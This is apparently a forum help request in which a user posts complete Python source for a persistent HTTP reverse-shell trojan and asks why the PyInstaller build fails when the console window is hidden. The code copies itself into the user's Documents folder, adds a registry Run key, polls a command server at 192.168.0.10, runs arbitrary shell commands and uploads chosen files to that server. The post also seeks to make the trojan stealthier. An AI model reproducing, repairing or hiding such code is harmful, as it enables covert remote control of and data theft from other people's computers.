I've gone through all of Pyinstaller's debugging steps and I'm kind of at my wit's end here, which is why I'm turning to this.
I'm attempting to make the switch to Python3 by writing some simple custom pentesting tools, and I'm currently writing a persistent HTTP reverse shell trojan. The full code is below:
import requests
import subprocess
import time
import os
import shutil
import winreg
path = os.getcwd().strip('\n')
null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split(b'=')
destination = str(userprof.decode().strip('\n\r')) + '\\Documents\\' + 'persistence.exe'
if not os.path.exists(destination):
shutil.copyfile(path + '\persistence.exe', str(destination))
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Run",0,winreg.KEY_ALL_ACCESS)
winreg.SetValueEx(key,'RegUpdater',0,winreg.REG_SZ,destination)
key.Close()
while True:
req = requests.get('http://192.168.0.10')
command = req.text
if "terminate" in command:
break
elif 'grab' in command:
grab,path = command.split(" * ")
if os.path.exists(path):
url = 'http://192.168.0.10/store'
files = {'file': open(path, 'rb'),'path': path}
r = requests.post(url, files=files)
else:
post_response = requests.post(url='http://192.168.0.10',data='[-] Not able to find the file.')
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
post_response = requests.post(url='http://192.168.0.10', data=CMD.stdout.read())
post_response = requests.post(url='http://192.168.0.10', data=CMD.stderr.read())
time.sleep(3)
This script runs fine when executed with the python interpreter; it connects back to a server on a different machine using an HTTP GET request and installs itself in the user's Document's folder while also setting a Run key for persistence. Commands can then be executed on the server side and the output is transmitted through POST requests.
Obviously, I'd like to compile this into a standalone EXE to make it a true trojan. I can do this with the following command as specified in Pyinstaller's documentation:
pyinstaller --onefile persistence.py
This works just fine, the script runs without error as before whether when run from a terminal or clicked on. Unfortunately, it also opens an empty terminal window which is impossible to miss; obviously, this is an undesirable trait for a trojan. I wouldn't want to burden the user with another window on their screen!
The following should prevent that console window from opening:
pyinstaller --onefile --noconsole persistence.py
This command completes without error, but this time the script will not run. Whenever executed, regardless if it's clicked on or executed from a terminal, it kicks back a window saying "Failed to execute script persistence".
I have tried a huge amount of debugging to fix this. Adding --debug all to the freeze command doesn't seem to provide any useful information I can discern. I've been all through Google and through Pyinstaller's issues and I've seen a lot of stuff that seems to indicate an issue with the subprocess module and how STDIN and STDOUT are handled, but no amount of tinkering with my script and the subprocess.Popen calls (redirecting STDIN, STDOUT, and STDERR) seems to correct this issue. I always end up with an executable that throws "Failed to execute script".
I am running the current dev version of pyinstaller, I have tried it without packing (no dice), and I have even tried to manually remove the console window in the script itself with no success.
So I'm turning to you guys. Any ideas? Thanks very much for your time, and let me know if you need more information!!
